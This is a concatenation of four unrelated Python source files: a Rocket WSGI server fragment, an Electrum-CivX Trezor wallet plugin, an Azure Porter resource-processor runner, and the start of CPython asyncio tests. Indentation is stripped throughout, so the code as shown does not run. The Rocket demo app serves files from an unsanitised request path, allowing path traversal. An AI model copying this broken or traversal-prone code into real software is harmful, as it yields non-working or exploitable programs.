if (s < 200 or s not in (204, 205, 304)) and not self.chunked:
if sections == 1 or self.protocol != "HTTP/1.1":
# Add a Content-Length header because it's not there
self.size = len(data)
h_set["Content-Length"] = str(self.size)
else:
# If they sent us more than one section, we blow chunks
h_set["Transfer-Encoding"] = "Chunked"
self.chunked = True
if __debug__:
self.err_log.debug(
"Adding header..." "Transfer-Encoding: Chunked"
)
if "Connection" not in h_set:
# If the application did not provide a connection header,
# fill it in
client_conn = self.environ.get("HTTP_CONNECTION", "").lower()
if self.environ["SERVER_PROTOCOL"] == "HTTP/1.1":
# HTTP = 1.1 defaults to keep-alive connections
if client_conn:
h_set["Connection"] = client_conn
else:
h_set["Connection"] = "keep-alive"
else:
# HTTP < 1.1 supports keep-alive but it's quirky
# so we don't support it
h_set["Connection"] = "close"
# Close our connection if we need to.
self.closeConnection = h_set.get("Connection", "").lower() == "close"
# Build our output headers
header_data = HEADER_RESPONSE % (self.status, str(h_set))
# Send the headers
if __debug__:
self.err_log.debug("Sending Headers: %s" % repr(header_data))
self.conn.sendall(header_data.encode("utf8"))
self.headers_sent = True
def write_warning(self, data, sections=None):
self.err_log.warning(
"WSGI app called write method directly. This is "
"deprecated behavior. Please update your app."
)
return self.write(data, sections)
def write(self, data, sections=None):
""" Write the data to the output socket. """
if self.error[0]:
self.status = self.error[0]
data = self.error[1]
if isinstance(data, str):
data = data.encode("ISO-8859-1")
if not self.headers_sent:
self.send_headers(data, sections)
if self.request_method != "HEAD":
try:
if self.chunked:
self.conn.sendall(b"%x\r\n%s\r\n" % (len(data), data))
else:
self.conn.sendall(data)
except socket.timeout:
self.closeConnection = True
except socket.error:
# But some clients will close the connection before that
# resulting in a socket error.
self.closeConnection = True
def start_response(self, status, response_headers, exc_info=None):
"""Store the HTTP status and headers to be sent when self.write is
called."""
if exc_info:
try:
if self.headers_sent:
# Re-raise original exception if headers sent
# because this violates WSGI specification.
raise # pylint: disable=misplaced-bare-raise
finally:
exc_info = None
elif self.header_set:
raise AssertionError("Headers already set!")
if not isinstance(status, str):
self.status = str(status, "ISO-8859-1")
else:
self.status = status
# Make sure headers are bytes objects
try:
self.header_set = Headers(response_headers)
except UnicodeDecodeError:
self.error = ("500 Internal Server Error", "HTTP Headers should be bytes")
self.err_log.error(
"Received HTTP Headers from client that contain"
" invalid characters for Latin-1 encoding."
)
return self.write_warning
def run_app(self, conn):
self.size = 0
self.header_set = Headers([])
self.headers_sent = False
self.error = (None, None)
self.chunked = False
sections = None
output = None
if __debug__:
self.err_log.debug("Getting sock_file")
# Build our file-like object
sock_file = conn.makefile(mode="rb", buffering=BUF_SIZE)
try:
# Read the headers and build our WSGI environment
self.environ = environ = self.build_environ(sock_file, conn)
# Handle 100 Continue
if environ.get("HTTP_EXPECT", "") == "100-continue":
res = environ["SERVER_PROTOCOL"] + " 100 Continue\r\n\r\n"
conn.sendall(res.encode("utf8"))
# Send it to our WSGI application
output = self.app(environ, self.start_response)
if not hasattr(output, "__len__") and not hasattr(output, "__iter__"):
self.error = (
"500 Internal Server Error",
"WSGI applications must return a list or " "generator type.",
)
if hasattr(output, "__len__"):
sections = len(output)
for data in output:
# Don't send headers until body appears
if data:
self.write(data, sections)
if not self.headers_sent:
# Send headers if the body was empty
self.send_headers("", sections)
if self.chunked and self.request_method != "HEAD":
# If chunked, send our final chunk length
self.conn.sendall(b"0\r\n\r\n")
# Don't capture exceptions here. The Worker class handles
# them appropriately.
finally:
if __debug__:
self.err_log.debug("Finally closing output and sock_file")
if hasattr(output, "close"):
output.close()
sock_file.close()
# Monolithic build...end of module: rocket/methods/wsgi.py
def demo_app(environ, start_response):
types = {
"htm": "text/html",
"html": "text/html",
"gif": "image/gif",
"jpg": "image/jpeg",
"png": "image/png",
"pdf": "applications/pdf",
}
if os.path.exists("static"):
static_folder = os.path.join(os.getcwd(), "static")
path = os.path.join(static_folder, environ["PATH_INFO"][1:] or "index.html")
type = types.get(path.split(".")[-1], "text")
if os.path.exists(path):
try:
data = open(path, "rb").read()
start_response("200 OK", [("Content-Type", type)])
except IOError:
start_response("404 NOT FOUND", [])
data = "404 NOT FOUND"
else:
start_response("500 INTERNAL SERVER ERROR", [])
data = "500 INTERNAL SERVER ERROR"
else:
start_response("200 OK", [("Content-Type", "text/html")])
data = "<html><body><h1>Hello from Rocket Web Server</h1></body></html>"
return [data]
def demo():
from optparse import OptionParser
parser = OptionParser()
parser.add_option(
"-i",
"--ip",
dest="ip",
default="127.0.0.1",
help="ip address of the network interface",
)
parser.add_option(
"-p", "--port", dest="port", default="8000", help="post where to run web server"
)
parser.add_option(
"-s",
"--static",
dest="static",
default=None,
help="folder containing static files",
)
(options, args) = parser.parse_args()
global static_folder
static_folder = options.static
print("Rocket running on %s:%s" % (options.ip, options.port))
r = Rocket3((options.ip, int(options.port)), "wsgi", {"wsgi_app": demo_app})
r.start()
if __name__ == "__main__":
demo()
|
trezor.py
|
from binascii import hexlify, unhexlify
import traceback
import sys
from electrum_civx.util import bfh, bh2u, versiontuple, UserCancelled
from electrum_civx.bitcoin import (b58_address_to_hash160, xpub_from_pubkey, deserialize_xpub,
TYPE_ADDRESS, TYPE_SCRIPT, is_address)
from electrum_civx import constants
from electrum_civx.i18n import _
from electrum_civx.plugin import BasePlugin, Device
from electrum_civx.transaction import deserialize, Transaction
from electrum_civx.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey
from electrum_civx.base_wizard import ScriptTypeNotSupported
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import is_any_tx_output_on_change_branch, trezor_validate_op_return_output_and_get_data
# TREZOR initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
RECOVERY_TYPE_SCRAMBLED_WORDS, RECOVERY_TYPE_MATRIX = range(0, 2)
class TrezorKeyStore(Hardware_KeyStore):
hw_type = 'trezor'
device = 'TREZOR'
def get_derivation(self):
return self.derivation
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise RuntimeError(_('Encryption and decryption are not implemented by {}').format(self.device))
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
# path of the xpubs that are involved
xpub_path = {}
for txin in tx.inputs():
pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
tx_hash = txin['prevout_hash']
if txin.get('prev_tx') is None and not Transaction.is_segwit_input(txin):
raise Exception(_('Offline signing with {} is not supported for legacy inputs.').format(self.device))
prev_tx[tx_hash] = txin['prev_tx']
for x_pubkey in x_pubkeys:
if not is_xpubkey(x_pubkey):
continue
xpub, s = parse_xpubkey(x_pubkey)
if xpub == self.get_master_public_key():
xpub_path[xpub] = self.get_derivation()
self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class TrezorPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, types
firmware_URL = 'https://wallet.trezor.io'
libraries_URL = 'https://github.com/trezor/python-trezor'
minimum_firmware = (1, 5, 2)
keystore_class = TrezorKeyStore
minimum_library = (0, 9, 0)
SUPPORTED_XTYPES = ('standard', 'p2wpkh-p2sh', 'p2wpkh', 'p2wsh-p2sh', 'p2wsh')
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
self.libraries_available = self.check_libraries_available()
if not self.libraries_available:
return
from . import client
from . import transport
import trezorlib.messages
self.client_class = client.TrezorClient
self.types = trezorlib.messages
self.DEVICE_IDS = ('TREZOR',)
self.transport_handler = transport.TrezorTransport()
self.device_manager().register_enumerate_func(self.enumerate)
def get_library_version(self):
import trezorlib
try:
return trezorlib.__version__
except AttributeError:
return 'unknown'
def enumerate(self):
devices = self.transport_handler.enumerate_devices()
return [Device(d.get_path(), -1, d.get_path(), 'TREZOR', 0) for d in devices]
def create_client(self, device, handler):
try:
self.print_error("connecting to device at", device.path)
transport = self.transport_handler.get_transport(device.path)
except BaseException as e:
self.print_error("cannot connect at", device.path, str(e))
return None
if not transport:
self.print_error("cannot connect at", device.path)
return
self.print_error("connected to device at", device.path)
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.print_error("ping failed", str(e))
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
self.print_error(msg)
if handler:
handler.show_error(msg)
else:
raise Exception(msg)
return None
return client
def get_client(self, keystore, force_pair=True):
devmgr = self.device_manager()
handler = keystore.handler
with devmgr.hid_lock:
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "CivX Testnet" if constants.net.TESTNET else "CivX"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
model = client.get_trezor_model()
def f(method):
import threading
settings = self.request_trezor_init_settings(wizard, method, model)
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
exit_code = wizard.loop.exec_()
if exit_code != 0:
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
exit_code = 0
try:
self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
exit_code = 1
except BaseException as e:
traceback.print_exc(file=sys.stderr)
handler.show_error(str(e))
exit_code = 1
finally:
wizard.loop.exit(exit_code)
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection, recovery_type = settings
if method == TIM_RECOVER and recovery_type == RECOVERY_TYPE_SCRAMBLED_WORDS:
handler.show_error(_(
"You will be asked to enter 24 words regardless of your "
"seed's actual length. If you enter a word incorrectly or "
"misspell it, you cannot change it or go back - you will need "
"to start again from the beginning.\n\nSo please enter "
"the words carefully!"),
blocking=True)
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
u2f_counter = 0
skip_backup = False
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language,
u2f_counter, skip_backup)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
if recovery_type == RECOVERY_TYPE_SCRAMBLED_WORDS:
recovery_type_trezor = self.types.RecoveryDeviceType.ScrambledWords
else:
recovery_type_trezor = self.types.RecoveryDeviceType.Matrix
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language,
type=recovery_type_trezor)
if recovery_type == RECOVERY_TYPE_MATRIX:
handler.close_matrix_dialog()
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
def _make_node_path(self, xpub, address_n):
_, depth, fingerprint, child_num, chain_code, key = deserialize_xpub(xpub)
node = self.types.HDNodeType(
depth=depth,
fingerprint=int.from_bytes(fingerprint, 'big'),
child_num=int.from_bytes(child_num, 'big'),
chain_code=chain_code,
public_key=key,
)
return self.types.HDNodePathType(node=node, address_n=address_n)
def setup_device(self, device_info, wizard, purpose):
devmgr = self.device_manager()
device_id = device_info.device.id_
client = devmgr.client_by_id(device_id)
if client is None:
raise Exception(_('Failed to create a client for this device.') + '\n' +
_('Make sure it is in the correct state.'))
# fixme: we should use: client.handler = wizard
client.handler = self.create_handler(wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
client.get_xpub('m', 'standard')
client.used()
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
client.handler = wizard
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def get_trezor_input_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.InputScriptType.SPENDWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.InputScriptType.SPENDP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return self.types.InputScriptType.SPENDADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.InputScriptType.SPENDMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def get_trezor_output_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.OutputScriptType.PAYTOWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.OutputScriptType.PAYTOP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return self.types.OutputScriptType.PAYTOADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.OutputScriptType.PAYTOMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
self.prev_tx = prev_tx
self.xpub_path = xpub_path
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, True)
outputs = self.tx_outputs(keystore.get_derivation(), tx)
signatures = client.sign_tx(self.get_coin_name(), inputs, outputs, lock_time=tx.locktime)[0]
signatures = [(bh2u(x) + '01') for x in signatures]
tx.update_signatures(signatures)
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
client = self.get_client(keystore)
if not client.atleast_version(1, 3):
keystore.handler.show_error(_("Your device firmware is too old"))
return
change, index = wallet.get_address_index(address)
derivation = keystore.derivation
address_path = "%s/%d/%d"%(derivation, change, index)
address_n = client.expand_path(address_path)
xpubs = wallet.get_master_public_keys()
if len(xpubs) == 1:
script_type = self.get_trezor_input_script_type(wallet.txin_type)
client.get_address(self.get_coin_name(), address_n, True, script_type=script_type)
else:
def f(xpub):
return self._make_node_path(xpub, [change, index])
pubkeys = wallet.get_public_keys(address)
# sort xpubs using the order of pubkeys
sorted_pubkeys, sorted_xpubs = zip(*sorted(zip(pubkeys, xpubs)))
pubkeys = list(map(f, sorted_xpubs))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * wallet.n,
m=wallet.m,
)
script_type = self.get_trezor_input_script_type(wallet.txin_type)
client.get_address(self.get_coin_name(), address_n, True, multisig=multisig, script_type=script_type)
def tx_inputs(self, tx, for_sig=False):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin['type'] == 'coinbase':
prev_hash = b"\x00"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
x_pubkeys = txin['x_pubkeys']
if len(x_pubkeys) == 1:
x_pubkey = x_pubkeys[0]
xpub, s = parse_xpubkey(x_pubkey)
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype._extend_address_n(xpub_n + s)
txinputtype.script_type = self.get_trezor_input_script_type(txin['type'])
else:
def f(x_pubkey):
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
else:
xpub = xpub_from_pubkey(0, bfh(x_pubkey))
s = []
return self._make_node_path(xpub, s)
pubkeys = list(map(f, x_pubkeys))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=list(map(lambda x: bfh(x)[:-1] if x else b'', txin.get('signatures'))),
m=txin.get('num_sig'),
)
script_type = self.get_trezor_input_script_type(txin['type'])
txinputtype = self.types.TxInputType(
script_type=script_type,
multisig=multisig
)
# find which key is mine
for x_pubkey in x_pubkeys:
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
if xpub in self.xpub_path:
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype._extend_address_n(xpub_n + s)
break
prev_hash = unhexlify(txin['prevout_hash'])
prev_index = txin['prevout_n']
if 'value' in txin:
txinputtype.amount = txin['value']
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if txin.get('scriptSig') is not None:
script_sig = bfh(txin['scriptSig'])
txinputtype.script_sig = script_sig
txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
inputs.append(txinputtype)
return inputs
def tx_outputs(self, derivation, tx):
def create_output_by_derivation():
script_type = self.get_trezor_output_script_type(info.script_type)
if len(xpubs) == 1:
address_n = self.client_class.expand_path(derivation + "/%d/%d" % index)
txoutputtype = self.types.TxOutputType(
amount=amount,
script_type=script_type,
address_n=address_n,
)
else:
address_n = self.client_class.expand_path("/%d/%d" % index)
pubkeys = [self._make_node_path(xpub, address_n) for xpub in xpubs]
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * len(pubkeys),
m=m)
txoutputtype = self.types.TxOutputType(
multisig=multisig,
amount=amount,
address_n=self.client_class.expand_path(derivation + "/%d/%d" % index),
script_type=script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = amount
if _type == TYPE_SCRIPT:
txoutputtype.script_type = self.types.OutputScriptType.PAYTOOPRETURN
txoutputtype.op_return_data = trezor_validate_op_return_output_and_get_data(o)
elif _type == TYPE_ADDRESS:
txoutputtype.script_type = self.types.OutputScriptType.PAYTOADDRESS
txoutputtype.address = address
return txoutputtype
outputs = []
has_change = False
any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)
for o in tx.outputs():
_type, address, amount = o.type, o.address, o.value
use_create_by_derivation = False
info = tx.output_info.get(address)
if info is not None and not has_change:
index, xpubs, m = info.address_index, info.sorted_xpubs, info.num_sig
on_change_branch = index[0] == 1
# prioritise hiding outputs on the 'change' branch from user
# because no more than one change address allowed
# note: ^ restriction can be removed once we require fw
# that has https://github.com/trezor/trezor-mcu/pull/306
if on_change_branch == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation()
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx):
t = self.types.TransactionType()
if tx is None:
# probably for segwit input and we don't need this prev txn
return t
d = deserialize(tx.raw)
t.version = d['version']
t.lock_time = d['lockTime']
inputs = self.tx_inputs(tx)
t._extend_inputs(inputs)
for vout in d['outputs']:
o = t._add_bin_outputs()
o.amount = vout['value']
o.script_pubkey = bfh(vout['scriptPubKey'])
return t
# This function is called from the TREZOR libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electrum_tx_to_txtype(tx)
|
runner.py
|
import threading
from typing import Optional
from multiprocessing import Process
import json
import socket
import asyncio
import logging
import sys
from resources.commands import build_porter_command, build_porter_command_for_outputs
from shared.config import get_config
from resources.helpers import get_installation_id
from resources.httpserver import start_server
from shared.logging import disable_unwanted_loggers, initialize_logging, get_message_id_logger, shell_output_logger # pylint: disable=import-error # noqa
from resources import strings, statuses # pylint: disable=import-error # noqa
from contextlib import asynccontextmanager
from azure.servicebus import ServiceBusMessage, NEXT_AVAILABLE_SESSION
from azure.servicebus.exceptions import OperationTimeoutError, ServiceBusConnectionError
from azure.servicebus.aio import ServiceBusClient, AutoLockRenewer
from azure.identity.aio import DefaultAzureCredential
def set_up_logger(enable_console_logging: bool) -> logging.LoggerAdapter:
# Initialise logging
logger_adapter = initialize_logging(logging.INFO, socket.gethostname(), enable_console_logging)
disable_unwanted_loggers()
return logger_adapter
def set_up_config(logger_adapter: logging.LoggerAdapter) -> Optional[dict]:
try:
config = get_config(logger_adapter)
return config
except KeyError as e:
logger_adapter.error(f"Environment variable {e} is not set correctly...Exiting")
sys.exit(1)
@asynccontextmanager
async def default_credentials(msi_id):
"""
Context manager which yields the default credentials.
"""
credential = DefaultAzureCredential(managed_identity_client_id=msi_id) if msi_id else DefaultAzureCredential()
yield credential
await credential.close()
async def receive_message(service_bus_client, logger_adapter: logging.LoggerAdapter, config: dict):
"""
This method is run per process. Each process will connect to service bus and try to establish a session.
If messages are there, the process will continue to receive all the messages associated with that session.
If no messages are there, the session connection will time out, sleep, and retry.
"""
q_name = config["resource_request_queue"]
while True:
try:
logger_adapter.info("Looking for new session...")
# max_wait_time=1 -> don't hold the session open after processing of the message has finished
async with service_bus_client.get_queue_receiver(queue_name=q_name, max_wait_time=1, session_id=NEXT_AVAILABLE_SESSION) as receiver:
logger_adapter.info("Got a session containing messages")
async with AutoLockRenewer() as renewer:
# allow a session to be auto lock renewed for up to an hour - if it's processing a message
renewer.register(receiver, receiver.session, max_lock_renewal_duration=3600)
async for msg in receiver:
result = True
message = ""
try:
message = json.loads(str(msg))
logger_adapter.info(f"Message received for resource_id={message['id']}, operation_id={message['operationId']}, step_id={message['stepId']}")
message_logger_adapter = get_message_id_logger(message['operationId']) # correlate messages per operation
result = await invoke_porter_action(message, service_bus_client, message_logger_adapter, config)
except (json.JSONDecodeError) as e:
logging.error(f"Received bad service bus resource request message: {e}")
if result:
logging.info(f"Resource request for {message} is complete")
else:
logging.error('Message processing failed!')
logger_adapter.info(f"Message for resource_id={message['id']}, operation_id={message['operationId']} processed as {result} and marked complete.")
await receiver.complete_message(msg)
logger_adapter.info("Closing session")
await renewer.close()
except OperationTimeoutError:
# Timeout occurred whilst connecting to a session - this is expected and indicates no non-empty sessions are available
logger_adapter.info("No sessions for this process. Will look again...")
except ServiceBusConnectionError:
# Occasionally there will be a transient / network-level error in connecting to SB.
logger_adapter.info("Unknown Service Bus connection error. Will retry...")
except Exception:
# Catch all other exceptions, log them via .exception to get the stack trace, sleep, and reconnect
logger_adapter.exception("Unknown exception. Will retry...")
async def run_porter(command, logger_adapter: logging.LoggerAdapter, config: dict):
"""
Run a Porter command
"""
proc = await asyncio.create_subprocess_shell(
''.join(command),
stdout=asyncio.subprocess.PIPE,
stderr=asyncio.subprocess.PIPE,
env=config["porter_env"])
stdout, stderr = await proc.communicate()
logging.info(f'run porter exited with {proc.returncode}')
result_stdout = None
result_stderr = None
if stdout:
result_stdout = stdout.decode()
shell_output_logger(result_stdout, '[stdout]', logger_adapter, logging.INFO)
if stderr:
result_stderr = stderr.decode()
shell_output_logger(result_stderr, '[stderr]', logger_adapter, logging.WARN)
return (proc.returncode, result_stdout, result_stderr)
def service_bus_message_generator(sb_message: dict, status: str, deployment_message: str, outputs=None):
"""
Generate a resource request message
"""
installation_id = get_installation_id(sb_message)
message_dict = {
"operationId": sb_message["operationId"],
"stepId": sb_message["stepId"],
"id": sb_message["id"],
"status": status,
"message": f"{installation_id}: {deployment_message}"}
if outputs is not None:
message_dict["outputs"] = outputs
resource_request_message = json.dumps(message_dict)
return resource_request_message
async def invoke_porter_action(msg_body: dict, sb_client: ServiceBusClient, message_logger_adapter: logging.LoggerAdapter, config: dict) -> bool:
"""
Handle resource message by invoking specified porter action (i.e. install, uninstall)
"""
installation_id = get_installation_id(msg_body)
action = msg_body["action"]
message_logger_adapter.info(f"{installation_id}: {action} action starting...")
sb_sender = sb_client.get_queue_sender(queue_name=config["deployment_status_queue"])
# If the action is install/upgrade, post message on sb queue to start a deployment job
if action == "install" or action == "upgrade":
resource_request_message = service_bus_message_generator(msg_body, strings.RESOURCE_STATUS_DEPLOYING, "Deployment job starting")
await sb_sender.send_messages(ServiceBusMessage(body=resource_request_message, correlation_id=msg_body["id"]))
# Build and run porter command (flagging if its a built-in action or custom so we can adapt porter command appropriately)
is_custom_action = action not in ["install", "upgrade", "uninstall"]
porter_command = await build_porter_command(config, message_logger_adapter, msg_body, is_custom_action)
returncode, _, err = await run_porter(porter_command, message_logger_adapter, config)
# Handle command output
if returncode != 0:
error_message = "Error context message = " + " ".join(err.split('\n')) + " ; Command executed: ".join(porter_command)
resource_request_message = service_bus_message_generator(msg_body, statuses.failed_status_string_for[action], error_message)
# Post message on sb queue to notify receivers of action failure
await sb_sender.send_messages(ServiceBusMessage(body=resource_request_message, correlation_id=msg_body["id"]))
message_logger_adapter.info(f"{installation_id}: Porter action failed with error = {error_message}")
return False
else:
# Get the outputs
# TODO: decide if this should "fail" the deployment
_, outputs = await get_porter_outputs(msg_body, message_logger_adapter, config)
success_message = f"{action} action completed successfully."
resource_request_message = service_bus_message_generator(msg_body, statuses.pass_status_string_for[action], success_message, outputs)
await sb_sender.send_messages(ServiceBusMessage(body=resource_request_message, correlation_id=msg_body["id"]))
message_logger_adapter.info(f"{installation_id}: {success_message}")
return True
async def get_porter_outputs(msg_body: dict, message_logger_adapter: logging.LoggerAdapter, config: dict):
"""
Get outputs JSON from a Porter command
"""
porter_command = await build_porter_command_for_outputs(msg_body)
returncode, stdout, err = await run_porter(porter_command, message_logger_adapter, config)
if returncode != 0:
error_message = "Error context message = " + " ".join(err.split('\n'))
message_logger_adapter.info(f"{get_installation_id(msg_body)}: Failed to get outputs with error = {error_message}")
return False, ""
else:
outputs_json = {}
try:
outputs_json = json.loads(stdout)
message_logger_adapter.info(f"Got outputs as json: {outputs_json}")
except ValueError:
message_logger_adapter.error(f"Got outputs invalid json: {stdout}")
return True, outputs_json
async def runner(logger_adapter: logging.LoggerAdapter, config: dict):
async with default_credentials(config["vmss_msi_id"]) as credential:
service_bus_client = ServiceBusClient(config["service_bus_namespace"], credential)
await receive_message(service_bus_client, logger_adapter, config)
def start_runner_process(config: dict):
# Set up logger adapter copy for this process
logger_adapter = set_up_logger(enable_console_logging=False)
asyncio.ensure_future(runner(logger_adapter, config))
event_loop = asyncio.get_event_loop()
event_loop.run_forever()
logger_adapter.info("Started resource processor")
if __name__ == "__main__":
httpserver_thread = threading.Thread(target=start_server)
httpserver_thread.start()
logger_adapter: logging.LoggerAdapter = set_up_logger(enable_console_logging=True)
config = set_up_config(logger_adapter)
logger_adapter.info("Started http server")
logger_adapter.info(f'Starting {str(config["number_processes_int"])} processes...')
for i in range(config["number_processes_int"]):
logger_adapter.info(f'Starting process {str(i)}')
process = Process(target=lambda: start_runner_process(config))
process.start()
|
test_base_events.py
|
"""Tests for base_events.py"""
import errno
import logging
import math
import os
import socket
import sys
import threading
import time
import unittest
from unittest import mock
import asyncio
from asyncio import base_events
from asyncio import constants
from asyncio import events
from test.test_asyncio import utils as test_utils
from test import support
from test.support.script_helper import assert_python_ok
MOCK_ANY = mock.ANY
PY34 = sys.version_info >= (3, 4)
def mock_socket_module():
m_socket = mock.MagicMock(spec=socket)
for name in (
'AF_INET', 'AF_INET6', 'AF_UNSPEC', 'IPPROTO_TCP', 'IPPROTO_UDP',
'SOCK_STREAM', 'SOCK_DGRAM', 'SOL_SOCKET', 'SO_REUSEADDR', 'inet_pton'
):
if hasattr(socket, name):
setattr(m_socket, name, getattr(socket, name))
else:
delattr(m_socket, name)
m_socket.socket = mock.MagicMock()
m_socket.socket.return_value = test_utils.mock_nonblocking_socket()
m_socket.getaddrinfo._is_coroutine = False
return m_socket
def patch_socket(f):
return mock.patch('asyncio.base_events.socket',
new_callable=mock_socket_module)(f)
class BaseEventTests(test_utils.TestCase):
def test_ipaddr_info(self):
UNSPEC = socket.AF_UNSPEC
INET = socket.AF_INET
INET6 = socket.AF_INET6
STREAM = socket.SOCK_STREAM
DGRAM = socket.SOCK_DGRAM
TCP = socket.IPPROTO_TCP
UDP = socket.IPPROTO_UDP
self.assertEqual(
(INET, STREAM, TCP, '', ('1.2.3.4', 1)),
base_events._ipaddr_info('1.2.3.4', 1, INET, STREAM, TCP))
self.assertEqual(
(INET, STREAM, TCP, '', ('1.2.3.4', 1)),
base_events._ipaddr_info(b'1.2.3.4', 1, INET, STREAM, TCP))
self.assertEqual(
(INET, STREAM, TCP, '', ('1.2.3.4', 1)),
base_events._ipaddr_info('1.2.3.4', 1, UNSPEC, STREAM, TCP))
self.assertEqual(
(INET, DGRAM, UDP, '', ('1.2.3.4', 1)),
base_events._ipaddr_info('1.2.3.4', 1, UNSPEC, DGRAM, UDP))
# Socket type STREAM implies TCP protocol.
self.assertEqual(
(INET, STREAM, TCP, '', ('1.2.3.4', 1)),
base_events._ipaddr_info('1.2.3.4', 1, UNSPEC, STREAM, 0))
# Socket type DGRAM implies UDP protocol.
self.assertEqual(
(INET, DGRAM, UDP, '', ('1.2.3.4', 1)),
base_events._ipaddr_info('1.2.3.4', 1, UNSPEC, DGRAM, 0))
# No socket type.
self.assertIsNone(
base_events._ipaddr_info('1.2.3.4', 1, UNSPEC, 0, 0))
# IPv4 address with family IPv6.
self.assertIsNone(
base_events._ipaddr_info('1.2.3.4', 1, INET6, STREAM, TCP))
self.assertEqual(
(INET6, STREAM, TCP, '', ('::3', 1, 0, 0)),
base_events._ipaddr_info('::3', 1, INET6, STREAM, TCP))
self.assertEqual(
(INET6, STREAM, TCP, '', ('::3', 1, 0, 0)),
